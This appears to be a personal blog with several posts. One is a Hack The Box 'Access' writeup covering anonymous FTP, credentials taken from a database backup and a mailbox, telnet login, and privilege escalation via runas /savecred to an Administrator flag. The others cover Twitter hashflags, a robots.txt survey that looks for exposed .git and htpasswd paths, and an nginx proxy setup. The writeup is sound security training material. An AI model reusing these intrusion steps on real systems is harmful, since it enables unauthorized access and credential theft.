Access: Hack The Box writeup

Access info page

Recently I discovered Hack The Box, an online platform to hone your cyber security skills by practising on vulnerable VMs. The first box I solved is called Access. In this blog post I’ll walk through how I solved it. If you don’t want any spoilers, look away now!

Information gathering

Let’s start with an nmap scan to see what services are running on the box.

# nmap -n -v -Pn -p- -A --reason -oN nmap.txt 10.10.10.98
...
PORT   STATE SERVICE REASON  VERSION
21/tcp open  ftp     syn-ack Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
|_  SYST: Windows_NT
23/tcp open  telnet  syn-ack Microsoft Windows XP telnetd (no more connections allowed)
80/tcp open  http    syn-ack Microsoft IIS httpd 7.5
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: MegaCorp

nmap has found three services running: FTP, telnet, and an HTTP server. Let’s see what’s running on the HTTP server.

It’s just a static page, showing an image. Nothing interesting, so let’s move on for now.

Anonymous FTP

nmap showed that there is an FTP server running, with anonymous login allowed. Let’s see what’s on that server

# ftp 10.10.10.98
Connected to 10.10.10.98.
220 Microsoft FTP Service
Name (10.10.10.98:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18  08:16PM       <DIR>          Backups
08-24-18  09:00PM       <DIR>          Engineer
226 Transfer complete.
ftp> ls Backups
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18  08:16PM              5652480 backup.mdb
226 Transfer complete.
ftp> ls Engineer
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-24-18  12:16AM                10870 Access Control.zip
226 Transfer complete.

There are some interesting files here, let’s download them and analyse them

# wget ftp://anonymous:[email protected] --no-passive-ftp --mirror
--2019-02-02 15:37:26--  ftp://anonymous:*password*@10.10.10.98/
           => ‘10.10.10.98/.listing’
Connecting to 10.10.10.98:21... connected.
Logging in as anonymous ... Logged in!
...
FINISHED --2019-02-02 15:37:28--
Total wall clock time: 1.8s
Downloaded: 5 files, 5.4M in 1.4s (3.99 MB/s)

Microsoft Access

We’ve got a .mdb file—which is a Microsoft Access database file—and a zip file. If we take a quick look at the zip file it’s password protected. We’ll have to come back the that later.

We can examine backup.mdb using MDB tools. Maybe there’s something we can use there.

# mdb-tables Backups/backup.mdb
acc_antiback acc_door acc_firstopen acc_firstopen_emp acc_holidays acc_interlock acc_levelset acc_levelset_door_group acc_linkageio acc_map acc_mapdoorpos acc_morecardempgroup acc_morecardgroup acc_timeseg acc_wiegandfmt ACGroup acholiday ACTimeZones action_log AlarmLog areaadmin att_attreport att_waitforprocessdata attcalclog attexception AuditedExc auth_group_permissions auth_message auth_permission auth_user auth_user_groups auth_user_user_permissions base_additiondata base_appoption base_basecode base_datatranslation base_operatortemplate base_personaloption base_strresource base_strtranslation base_systemoption CHECKEXACT CHECKINOUT dbbackuplog DEPARTMENTS deptadmin DeptUsedSchs devcmds devcmds_bak django_content_type django_session EmOpLog empitemdefine EXCNOTES FaceTemp iclock_dstime iclock_oplog iclock_testdata iclock_testdata_admin_area iclock_testdata_admin_dept LeaveClass LeaveClass1 Machines NUM_RUN NUM_RUN_DEIL operatecmds personnel_area personnel_cardtype personnel_empchange personnel_leavelog ReportItem SchClass SECURITYDETAILS ServerLog SHIFT TBKEY TBSMSALLOT TBSMSINFO TEMPLATE USER_OF_RUN USER_SPEDAY UserACMachines UserACPrivilege USERINFO userinfo_attarea UsersMachines UserUpdates worktable_groupmsg worktable_instantmsg worktable_msgtype worktable_usrmsg ZKAttendanceMonthStatistics acc_levelset_emp acc_morecardset ACUnlockComb AttParam auth_group AUTHDEVICE base_option dbapp_viewmodel FingerVein devlog HOLIDAYS personnel_issuecard SystemLog USER_TEMP_SCH UserUsedSClasses acc_monitor_log OfflinePermitGroups OfflinePermitUsers OfflinePermitDoors LossCard TmpPermitGroups TmpPermitUsers TmpPermitDoors ParamSet acc_reader acc_auxiliary STD_WiegandFmt CustomReport ReportField BioTemplate FaceTempEx FingerVeinEx TEMPLATEEx

It looks like there’s a lot of autogenerated tables here, but those auth_* tables look interesting.

# mdb-export Backups/backup.mdb auth_user
id,username,password,Status,last_login,RoleID,Remark
25,"admin","admin",1,"08/23/18 21:11:47",26,
27,"engineer","[email protected]",1,"08/23/18 21:13:36",26,
28,"backup_admin","admin",1,"08/23/18 21:14:02",26,

Awesome! So we’ve got some credentials for engineer, and we’ve got a password protected zip file in the Engineer directory.

Microsoft Outlook

# 7z x Access\ Control.zip

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_GB.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs Intel(R) Core(TM) i7-7820HQ CPU @ 2.90GHz (906E9),ASM,AES-NI)

Scanning the drive for archives:
1 file, 10870 bytes (11 KiB)

Extracting archive: Access Control.zip
--
Path = Access Control.zip
Type = zip
Physical Size = 10870


Enter password (will not be echoed):
Everything is Ok

Size:       271360
Compressed: 10870

# ls
'Access Control.pst'  'Access Control.zip'

That worked! Now we’ve got the mailbox backup for the engineer, but we first need to convert it to something that we can read more easily on Linux.

# readpst Access\ Control.pst
Opening PST file and indexes...
Processing Folder "Deleted Items"
	"Access Control" - 2 items done, 0 items skipped.

Let’s take a peek at the engineer’s mailbox

# mail -f Access\ Control.mbox
mail version v14.9.11.  Type `?' for help
'/root/10.10.10.98/Engineer/Access Control.mbox': 1 message
▸O  1 [email protected]  2018-08-23 23:44   87/3112  MegaCorp Access Control System "security" account
?
[-- Message  1 -- 87 lines, 3112 bytes --]:
From "[email protected]" Thu Aug 23 23:44:07 2018
From: [email protected] <[email protected]>
Subject: MegaCorp Access Control System "security" account
To: '[email protected]'
Date: Thu, 23 Aug 2018 23:44:07 +0000

[-- #1.1 73/2670 multipart/alternative --]



[-- #1.1.1 15/211 text/plain, 7bit, utf-8 --]

Hi there,



The password for the “security” account has been changed to 4Cc3ssC0ntr0ller.  Please ensure this is pass
ed on to your engineers.



Regards,

John



[-- #1.1.2 51/2211 text/html, 7bit, us-ascii --]
?

Another set of credentials! I wonder what these are used for? Let’s try FTP first

# ftp 10.10.10.98
Connected to 10.10.10.98.
220 Microsoft FTP Service
Name (10.10.10.98:jamie): security
331 Password required for security.
Password:
530 User cannot log in.
ftp: Login failed.

No dice ☹. The only other option is telnet.

Telnet

# telnet 10.10.10.98
Trying 10.10.10.98...
Connected to 10.10.10.98.
Escape character is '^]'.
Welcome to Microsoft Telnet Service

login: security
password:

*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>

We’re in! The user.txt should be located on security’s Desktop

C:\Users\security>dir
 Volume in drive C has no label.
 Volume Serial Number is 9C45-DBF0

 Directory of C:\Users\security

02/02/2019  03:56 PM    <DIR>          .
02/02/2019  03:56 PM    <DIR>          ..
08/24/2018  07:37 PM    <DIR>          .yawcam
08/21/2018  10:35 PM    <DIR>          Contacts
08/28/2018  06:51 AM    <DIR>          Desktop
08/21/2018  10:35 PM    <DIR>          Documents
08/21/2018  10:35 PM    <DIR>          Downloads
08/21/2018  10:35 PM    <DIR>          Favorites
08/21/2018  10:35 PM    <DIR>          Links
08/21/2018  10:35 PM    <DIR>          Music
08/21/2018  10:35 PM    <DIR>          Pictures
08/21/2018  10:35 PM    <DIR>          Saved Games
08/21/2018  10:35 PM    <DIR>          Searches
08/24/2018  07:39 PM    <DIR>          Videos
               1 File(s)        964,179 bytes
              14 Dir(s)  16,745,127,936 bytes free

C:\Users\security>cd Desktop

C:\Users\security\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 9C45-DBF0

 Directory of C:\Users\security\Desktop

08/28/2018  06:51 AM    <DIR>          .
08/28/2018  06:51 AM    <DIR>          ..
08/21/2018  10:37 PM                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)  16,744,726,528 bytes free

C:\Users\security\Desktop>more user.txt
<SNIP>

Privilege escalation

Now that we’ve got the first flag, we need to escalate to root access—or more specifically Administrator on Windows.

The .yawcam directory looks out of the ordinary.

dir .yawcam
 Volume in drive C has no label.
 Volume Serial Number is 9C45-DBF0

 Directory of C:\Users\security\.yawcam

08/24/2018  07:37 PM    <DIR>          .
08/24/2018  07:37 PM    <DIR>          ..
08/23/2018  10:52 PM    <DIR>          2
08/22/2018  06:49 AM                 0 banlist.dat
08/23/2018  10:52 PM    <DIR>          extravars
08/22/2018  06:49 AM    <DIR>          img
08/23/2018  10:52 PM    <DIR>          logs
08/22/2018  06:49 AM    <DIR>          motion
08/22/2018  06:49 AM                 0 pass.dat
08/23/2018  10:52 PM    <DIR>          stream
08/23/2018  10:52 PM    <DIR>          tmp
08/23/2018  10:34 PM                82 ver.dat
08/23/2018  10:52 PM    <DIR>          www
08/24/2018  07:37 PM             1,411 yawcam_settings.xml
               4 File(s)          1,493 bytes
              10 Dir(s)  16,764,841,984 bytes free

However poking around in there proved fruitless. Maybe there’s a way to use this, but I couldn’t figure anything out.

Let’s keep looking

C:\Users\security>cd ../

C:\Users>dir
 Volume in drive C has no label.
 Volume Serial Number is 9C45-DBF0

 Directory of C:\Users

02/02/2019  04:15 PM    <DIR>          .
02/02/2019  04:15 PM    <DIR>          ..
08/23/2018  11:46 PM    <DIR>          Administrator
02/02/2019  04:15 PM    <DIR>          engineer
02/02/2019  04:14 PM    <DIR>          Public
02/02/2019  04:16 PM    <DIR>          security
               0 File(s)              0 bytes
               6 Dir(s)  16,754,778,112 bytes free

Maybe one of the other users has something interesting we can use?

C:\Users>cd engineer
Access is denied.

I didn’t really expect that to work anyway

C:\Users>cd Public

C:\Users\Public>dir
 Volume in drive C has no label.
 Volume Serial Number is 9C45-DBF0

 Directory of C:\Users\Public

02/02/2019  04:14 PM    <DIR>          .
02/02/2019  04:14 PM    <DIR>          ..
07/14/2009  05:06 AM    <DIR>          Documents
07/14/2009  04:57 AM    <DIR>          Downloads
07/14/2009  04:57 AM    <DIR>          Music
07/14/2009  04:57 AM    <DIR>          Pictures
07/14/2009  04:57 AM    <DIR>          Videos
               1 File(s)        964,179 bytes
               7 Dir(s)  16,723,468,288 bytes free

Wait a minute, we’re missing some of the standard Windows directories. Let’s have a closer look.


C:\Users\Public>dir /A
 Volume in drive C has no label.
 Volume Serial Number is 9C45-DBF0

 Directory of C:\Users\Public

02/02/2019  04:14 PM    <DIR>          .
02/02/2019  04:14 PM    <DIR>          ..
08/28/2018  06:51 AM    <DIR>          Desktop
07/14/2009  04:57 AM               174 desktop.ini
07/14/2009  05:06 AM    <DIR>          Documents
07/14/2009  04:57 AM    <DIR>          Downloads
07/14/2009  02:34 AM    <DIR>          Favorites
07/14/2009  04:57 AM    <DIR>          Libraries
07/14/2009  04:57 AM    <DIR>          Music
07/14/2009  04:57 AM    <DIR>          Pictures
07/14/2009  04:57 AM    <DIR>          Videos
               2 File(s)        964,353 bytes
              10 Dir(s)  16,717,438,976 bytes free

Desktop has a much more recent modification date than everything else

C:\Users\Public>cd Desktop

C:\Users\Public\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 9C45-DBF0

 Directory of C:\Users\Public\Desktop

08/22/2018  09:18 PM             1,870 ZKAccess3.5 Security System.lnk
               1 File(s)          1,870 bytes
               0 Dir(s)  16,711,475,200 bytes free

That’s because there’s a shortcut there.

Now, I’m not sure of the best way to view a .lnk on cmd.exe via telnet, but this is what I came up with. If anyone knows of a better way, please let me know!

C:\Users\Public\Desktop>type "ZKAccess3.5 Security System.lnk"
L�F�@ ��7���7���#�P/P�O� �:i�+00�/C:\R1M�:Windows��:��M�:*wWindowsV1MV�System32��:��MV�*�System32X2P�:�
                                                                                                        runas.exe��:1��:1�*Yrunas.exeL-K��E�C:\Windows\System32\runas.exe#..\..\..\Windows\System32\runas.exeC:\ZKTeco\ZKAccess3.5G/user:ACCESS\Administrator /savecred "C:\ZKTeco\ZKAccess3.5\Access.exe"'C:\ZKTeco\ZKAccess3.5\img\AccessNET.ico�%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico�%�
                      �wN���]N�D.��Q���`�Xaccess�_���8{E�3
                                                          O�j)�H���
                                                                   )ΰ[�_���8{E�3
                                                                                O�j)�H���
                                                                                         )ΰ[�	��1SPS�XF�L8C���&�m�e*S-1-5-21-953262931-566350628-63446256-500

It’s a bit difficult to read, but it looks like the shortcut runs a program as the Administrator using saved credentials. We can use that.

C:\Users\Public\Desktop>runas /user:Administrator /savecred "cmd.exe /c more C:\Users\Administrator\Desktop\root.txt > C:\Users\Public\Desktop\output.txt"

Did it work?

C:\Users\Public\Desktop>more output.txt
<SNIP>

Yes! From there we could generate a reverse shell using msfvenom and run that as Administrator, but I’ve got the flag so I’ll leave it there for now.

Twitter Hashflags (Hash-what?)

Have you ever tweeted out a hastag, and discovered a small image attached to the side of it? It could be for #StPatricksDay, #MarchForOurLives, or whatever #白白白白白白白白白白 is meant to be. These are hashflags.

A hashflag, sometimes called Twitter emoji, is a small image that appears after a #hashtag for special events. They are not regular emoji, and you can only use them on the Twitter website, or the official Twitter apps. For example:

If you’re a company, and you have enough money, you can buy your own hashflag as well! That’s exactly what Disney did for the release of Star Wars: The Last Jedi.

If you spend the money to buy a hashflag, it’s important that you launch it correctly—otherwise they can flop. #白白白白白白白白白白 is an example of what not to do. At time of writing, it has only 10 uses.

Hashflags aren’t exclusive to English, and they can help add context to a tweet in another language. I don’t speak any Russian, but I do know that this image is of BB-8!

Unfortunately hashflags are temporary, so any context they add to a tweet can sometimes be lost at a later date. Currently Twitter doesn’t provide an official API for hashflags, and there is no canonical list of currently active hashflags. @hashflaglist tracks hashflags, but it’s easy to miss one—this is where Azure Functions come in.

It turns out that on Twitter.com the list of currently active hashflags is sent as a JSON object in the HTML as initial data. All I need to do is fetch Twitter.com, and extract the JSON object from the HTML.

$ curl https://twitter.com -v --silent 2>&1 | grep -o -P '.{6}activeHashflags.{6}'

&quot;activeHashflags&quot;

I wrote some C# to parse and extract the activeHashflags JSON object, and store it in an Azure blob. You can find it here. Using Azure Functions I can run this code on a timer, so the Azure blob is always up to date with the latest Twitter hashflags. This means the blob can be used as an unofficial Twitter hashflags API—but I didn’t want to stop there.

I wanted to solve some of the issues with hashflags around both discovery and durability. Azure Functions is the perfect platform for these small, single purpose pieces of code. I ended up writing five Azure Functions in total—all of which can be found on GitHub.

Screenshot of hashflags-function GitHub page

  1. ActiveHashflags fetches the active hashflags from Twitter, and stores them in a JSON object in an Azure Storage Blob. You can find the list of current hashflags here.
  2. UpdateHashflagState reads the JSON, and updates the hashflag table with the current state of each hashflag.
  3. StoreHashflagImage downloads the hashflag image, and stores it in a blob store.
  4. CreateHeroImage creates a hero image of the hashtag and hashflag.
  5. TweetHashflag tweets the hashtag and hero image.

Say hello to @HashflagArchive!

Screenshot of HashflagArchive Twitter stream

@HashflagArchive solves both the issues I have with hashflags: it tweets out new hashflags the same hour they are activated on twitter, which solves the issue of discovery; and it tweets an image of the hashtag and hashflag, which solves the issue of hashflags being temporary.

So this is great, but there’s still one issue—how to use hashflags outside of Twitter.com and the official Twitter apps. This is where the JSON blob comes in. I can build a wrapper library around that, and then using that library, build applications with Twitter hashflags. So that’s exactly what I did.

Screenshot of hashflags-node GitHub page

I wrote an npm package called hashflags. It’s pretty simple to use, and integrates nicely with the official twitter-text npm package.

import { Hashflags } from 'hashflags';

let hf: Hashflags;
Hashflags.FETCH().then((val: Map<string, string>) => {
  hf = new Hashflags(val);
  console.log(hf.activeHashflags);
});

I wrote it in TypeScript, but it can also be used from plain old JS as well.

const Hashflags = require('hashflags').Hashflags;

let hf;
Hashflags.FETCH().then(val => {
  hf = new Hashflags(val);
  console.log(hf.activeHashflags);
});

So there you have it, a quick introduction to Twitter hashflags via Azure Functions and an npm library. If you’ve got any questions please leave a comment below, or reach out to me on Twitter @Jamie_Magee.

A survey of robots.txt - part two

In part one of this article, I collected robots.txt from the top 1 million sites on the web. In this article I’m going to do some analysis, and see if there’s anything interesting to find from all the files I’ve collected.

First we’ll start with some setup.

%matplotlib inline

import pandas as pd
import numpy as np
import glob
import os
import matplotlib

Next I’m going to load the content of each file into my pandas dataframe, calculate the file size, and store that for later.

l = [filename.split('/')[1] for filename in glob.glob('robots-txt/\*')]
df = pd.DataFrame(l, columns=['domain'])
df['content'] = df.apply(lambda x: open('robots-txt/' + x['domain']).read(), axis=1)
df['size'] = df.apply(lambda x: os.path.getsize('robots-txt/' + x['domain']), axis=1)
df.sample(5)
domain content size
612419 veapple.com User-agent: *\nAllow: /\n\nSitemap: http://www... 260
622296 buscadortransportes.com User-agent: *\nDisallow: /out/ 29
147795 dailynews360.com User-agent: *\nAllow: /\n\nDisallow: /search/\... 248
72823 newfoundlandpower.com User-agent: *\nDisallow: /Search.aspx\nDisallo... 528
601408 xfwed.com #\n# robots.txt for www.xfwed.com\n# Version 3... 201

File sizes

Now that we’ve done the setup, let’s see what the spread of file sizes in robots.txt is.

fig = df.plot.hist(title='robots.txt file size', bins=20)
fig.set_yscale('log')

png

It looks like the majority of robots.txt are under 250KB in size. This is really no surprise as robots.txt supports regex, so complex rulesets can be built easily.

Let’s take a look at the files larger than 1MB. I can think of three possibilities: they’re automatically maintained; they’re some other file masquerading as robots.txt; or the site is doing something seriously wrong.

large = df[df['size'] > 10 ** 6].sort_values(by='size', ascending=False)
import re

def count_directives(value, domain):
content = domain['content']
return len(re.findall(value, content, re.IGNORECASE))

large['disallow'] = large.apply(lambda x: count_directives('Disallow', x), axis=1)
large['user-agent'] = large.apply(lambda x: count_directives('User-agent', x), axis=1)
large['comments'] = large.apply(lambda x: count_directives('#', x), axis=1)

# The directives below are non-standard

large['crawl-delay'] = large.apply(lambda x: count_directives('Crawl-delay', x), axis=1)
large['allow'] = large.apply(lambda x: count_directives('Allow', x), axis=1)
large['sitemap'] = large.apply(lambda x: count_directives('Sitemap', x), axis=1)
large['host'] = large.apply(lambda x: count_directives('Host', x), axis=1)

large
domain content size disallow user-agent comments crawl-delay allow sitemap host
632170 haberborsa.com.tr User-agent: *\nAllow: /\n\nDisallow: /?ref=\nD... 5820350 71244 2 0 0 71245 5 10
23216 miradavetiye.com Sitemap: https://www.miradavetiye.com/sitemap_... 5028384 47026 7 0 0 47026 2 0
282904 americanrvcompany.com Sitemap: http://www.americanrvcompany.com/site... 4904266 56846 1 1 0 56852 2 0
446326 exibart.com User-Agent: *\nAllow: /\nDisallow: /notizia.as... 3275088 61403 1 0 0 61404 0 0
579263 sinospectroscopy.org.cn http://www.sinospectroscopy.org.cn/readnews.ph... 2979133 0 0 0 0 0 0 0
55309 vibralia.com # robots.txt automaticaly generated by PrestaS... 2835552 39712 1 15 0 39736 0 0
124850 oftalmolog30.ru User-Agent: *\nHost: chuzmsch.ru\nSitemap: htt... 2831975 87752 1 0 0 87752 2 2
557116 la-viephoto.com User-Agent:*\nDisallow:/aloha_blog/\nDisallow:... 2768134 29782 2 0 0 29782 2 0
677400 bigclozet.com User-agent: *\nDisallow: /item/\n\nUser-agent:... 2708717 51221 4 0 0 51221 0 0
621834 tranzilla.ru Host: tranzilla.ru\nSitemap: http://tranzilla.... 2133091 27647 1 0 0 27648 2 1
428735 autobaraholka.com User-Agent: *\nDisallow: /registration/\nDisal... 1756983 39330 1 0 0 39330 0 2
628591 megasmokers.ru User-agent: *\nDisallow: /*route=account/\nDis... 1633963 92 2 0 0 92 2 1
647336 valencia-cityguide.com # If the Joomla site is installed within a fol... 1559086 17719 1 12 0 17719 1 99
663372 vetality.fr # robots.txt automaticaly generated by PrestaS... 1536758 27737 1 12 0 27737 0 0
105735 golden-bee.ru User-agent: Yandex\nDisallow: /*_openstat\nDis... 1139308 24081 4 1 0 24081 0 1
454311 dreamitalive.com user-agent: google\ndisallow: /memberprofileda... 1116416 34392 3 0 0 34401 0 9
245895 gobankingrates.com User-agent: *\nDisallow: /wp-admin/\nAllow: /w... 1018109 7362 28 20 2 7363 0 0

It looks like all of these sites are misusing Disallow and Allow. In fact, looking at the raw files it appears as if they list all of the articles on the site under an individual Disallow command. I can only guess that when publishing an article, a corresponding line in robots.txt is added.

Now let’s take a look at the smallest robots.txt

small = df[df['size'] > 0].sort_values(by='size', ascending=True)

small.head(5)
domain content size
336828 iforce2d.net \n 1
55335 togetherabroad.nl \n 1
471397 behchat.ir \n 1
257727 docteurtamalou.fr 1
669247 lastminute-cottages.co.uk \n 1

There’s not really anything interesting here, so let’s take a look at some larger files

small = df[df['size'] > 10].sort_values(by='size', ascending=True)

small.head(5)
domain content size
676951 fortisbc.com sitemap.xml 11
369859 aurora.com.cn User-agent: 11
329775 klue.kr Disallow: / 11
390064 chneic.sh.cn Disallow: / 11
355604 hpi-mdf.com Disallow: / 11

Disallow: / tells all webcrawlers not to crawl anything on this site, and should (hopefully) keep it out of any search engines, but not all webcrawlers follow robots.txt.

User agents

User agents can be listed in robots.txt to either Allow or Disallow certain paths. Let’s take a look at the most common webcrawlers.

from collections import Counter

def find_user_agents(content):
    return re.findall('User-agent:? (.*)', content)

user_agent_list = [find_user_agents(x) for x in df['content']]
user_agent_count = Counter(x.strip() for xs in user_agent_list for x in set(xs))
user_agent_count.most_common(n=10)
[('*', 587729),
('Mediapartners-Google', 36654),
('Yandex', 29065),
('Googlebot', 25932),
('MJ12bot', 22250),
('Googlebot-Image', 16680),
('Baiduspider', 13646),
('ia_archiver', 13592),
('Nutch', 11204),
('AhrefsBot', 11108)]

It’s no surprise that the top result is a wildcard (*). Google takes spots 2, 4, and 6 with their AdSense, search and image web crawlers respectively. It does seem a little strange to see the AdSense bot listed above the usual search web crawler. Some of the other large search engines’ bots are also found in the top 10: Yandex, Baidu, and Yahoo (Slurp). MJ12bot is a crawler I had not heard of before, but according to their site it belongs to a UK based SEO company—and according to some of the results about it, it doesn’t behave very well. ia_archiver belongs to The Internet Archive, and (I assume) crawls pages for the Wayback Machine. Finally there is Apache Nutch, an open source webcrawler that can be run by anyone.

Security by obscurity

There are certain paths that you might not want a webcrawler to know about. For example, a .git directory, htpasswd files, or parts of a site that are still in testing, and aren’t meant to be found by anyone on Google. Let’s see if there’s anything interesting.

sec_obs = ['\.git', 'alpha', 'beta', 'secret', 'htpasswd', 'install\.php', 'setup\.php']
sec_obs_regex = re.compile('|'.join(sec_obs))

def find_security_by_obscurity(content):
return sec_obs_regex.findall(content)

sec_obs_list = [find_security_by_obscurity(x) for x in df['content']]
sec_obs_count = Counter(x.strip() for xs in sec_obs_list for x in set(xs))
sec_obs_count.most_common(10)
[('install.php', 28925),
('beta', 2834),
('secret', 753),
('alpha', 597),
('.git', 436),
('setup.php', 73),
('htpasswd', 45)]

Just because a file or directory is mentioned in robots.txt, it doesn’t mean that it can actually be accessed. However, if even 1% of Wordpress installs leave their install.php open to the world, that’s still a lot of vulnerable sites. Any attacker could get the keys to the kingdom very easily. The same goes for a .git directory. Even if it is read-only, people accidentally commit secrets to their git repository all the time.

Conclusion

robots.txt is a fairly innocuous part of the web. It’s been interesting to see how popular websites (ab)use it, and which web crawlers are naughty or nice. Most of all this has been a great exercise for myself in collecting data and analysing it using pandas and Jupyter.

The full data set is released under the Open Database License (ODbL) v1.0 and can be found on GitHub

A survey of robots.txt - part one

After reading CollinMorris’s analysis of favicons of the top 1 million sites on the web, I thought it would be interesting to do the same for other common parts of websites that often get overlooked.

The robots.txt file is a plain text file found at on most websites which communicates information to web crawlers and spiders about how to scan a website.. For example, here’s an excerpt from robots.txt for google.com

User-agent: *
Disallow: /search
Allow: /search/about
Allow: /search/howsearchworks
...

The above excerpt tells all web crawlers not to scan the /search path, but allows them to scan /search/about and /search/howsearchworks paths. There are a few more supported keywords, but these are the most common. Following these instructions is not required, but it is considered good internet etiquette. If you want to read more about the standard, Wikipedia has a great page here.

In order to do an analysis of robots.txt, first I need to crawl the web for them – ironic, I know.

Scraping

I wrote a scraper using scrapy to make a request for robots.txt for each of the domains in Alexa’s top 1 million websites. If the response code was 200, the Content-Type header contained text/plain, and the response body was not empty, I stored the response body in a file, with the same name as the domain name.

One complication I encountered was that not all domains respond on the same protocol or subdomain. For example, some websites respond on http://{domain_name} while others require http://www.{domain_name}. If a website doesn’t automatically redirect you to the correct protocol or subdomain, the only way to find the correct one, is to try them all! So I wrote a small class, extending scrapy’s RetryMiddleware, to do this:

COMMON_PREFIXES = {'http://', 'https://', 'http://www.', 'https://www.'}

class PrefixRetryMiddleware(RetryMiddleware):

    def process_exception(self, request, exception, spider):
            prefixes_tried = request.meta['prefixes']
            if COMMON_PREFIXES == prefixes_tried:
                return exception

            new_prefix = choice(tuple(COMMON_PREFIXES - prefixes_tried))
            request = self.update_request(request, new_prefix)

            return self._retry(request, exception, spider)

The rest of the scraper itself is quite simple, but you can read the full code on GitHub.

Results

Scraping the full Alexa top 1 million websites list took around 24 hours. Once it was finished, I had just under 700k robots.txt files

$ find -type f | wc -l
677686

totalling 493MB

$ du -sh
493M    .

The smallest robots.txt was 1 byte1, but the largest was over 5MB.

$ find -type f -exec du -Sh {} + | sort -rh | head -n 1
5.6M    ./haberborsa.com.tr

$ find -not -empty -type f -exec du -b {} + | sort -h | head -n 1
1    ./0434.cc

The full data set is released under the Open Database License (ODbL) v1.0 and can be found on GitHub

What’s next?

In the next part of this blog series I’m going to analyse all the robots.txt to see if I can find anything interesting. In particular I’d like to know why exactly someone needs a robots.txt file over 5MB in size, what is the most common web crawler listed (either allowed or disallowed), and are there any sites practising security by obscurity by trying to keep links out of search engines!


  1. I needed to include -not -empty when looking for the smallest file, as there were errors when decoding the response body for some domains. I’ve included the empty files in the dataset for posterity, but I will exclude them from further analysis. [return]

Setting up nginx reverse proxy with Let’s Encrypt on unRAID

Late last year I set about building a new NAS to replace my aging HP ProLiant MicroServer N36L (though that’s a story for a different post). I decided to go with unRAID as my OS, over FreeNAS that I’d been running previously, mostly due to the simpler configuration, ease of expanding an array, and support for Docker and KVM.

Docker support makes it a lot easier to run some of the web apps that I rely on like Plex, Sonarr, CouchPotato and more, but accessing them securely outside my network is a different story. On FreeNAS I ran an nginx reverse proxy in a BSD jail, secured using basic auth, and SSL certificates from StartSSL. Thankfully there is already a Docker image, nginx-proxy by jwilder, which automatically configures nginx for you. As for SSL, Let’s Encrypt went into public beta in December, and recently issued their millionth certificate. There’s also a Docker image which will automatically manage your certificates, and configure nginx for you - letsencrypt-nginx-proxy-companion by jrcs.

Preparation

Firstly, you need to set up and configure Docker. There is a fantastic guide on how to configure Docker here on the Lime Technology website. Next, you need to install the Community Applications plugin. This allows us to install Docker containers directly from the Docker Hub.

In order to access everything from outside your LAN you’ll need to forward ports 80 and 443 to ports 8008 and 443, respectively, on your unRAID host. In addition, you’ll need to use some sort of Dynamic DNS service, though in my case I bought a domain name and use CloudFlare to handle my DNS.

nginx

From the Apps page on the unRAID web interface, search for nginx-proxy and click ‘get more results from Docker Hub’. Click ‘add’ under the listing for nginx-proxy by jwilder. Set the following container settings, changing your ‘host path’ to wherever you store Docker configuration files on your unRAID host

nginx-proxy settings

To add basic auth to any of the sites you’ll need to make a file with the VIRTUAL_HOST of the site, available to nginx in /etc/nginx/htpasswd. For example, I added a file in /mnt/user/docker/nginx/htpasswd/. You can create htpasswd files using apache2-utils, or there are sites available which can create them.

Let’s Encrypt

From the Apps page again, search for letsencrypt-nginx-proxy-companion, click ‘get more results from Docker Hub’, and then click ‘add’ under the listing for letsencrypt-nginx-proxy-companion by jrcs. Enter the following container settings, again changing your ‘host path’ to wherever you store Docker configuration files on your unRAID host

lets encrypt settings

Putting it all together

In order to configure nginx, you’ll need to add four environment variables to the Docker containers you wish to put behind the reverse proxy. They are VIRTUAL_HOST, VIRTUAL_PORT, LETSENCRYPT_HOST, and LETSENCRYPT_EMAIL. VIRTUAL_HOST and LETSENCRYPT_HOST most likely need to be the same, and will be something like subdomain.yourdomain.com. VIRTUAL_PORT should be the port your Docker container exposes. For example, Sonarr uses port 8989 by default. LETSENCRYPT_EMAIL should be a valid email address that Let’s Encrypt can use to email you about certificate expiries, etc.

Once nginx-proxy, letsencrypt-nginx-proxy-companion, and all your Docker containers are configured you should be able to access them all over SSL, with basic auth, from outside your LAN. You don’t even have to worry about certificate renewals as it’s all handled for you.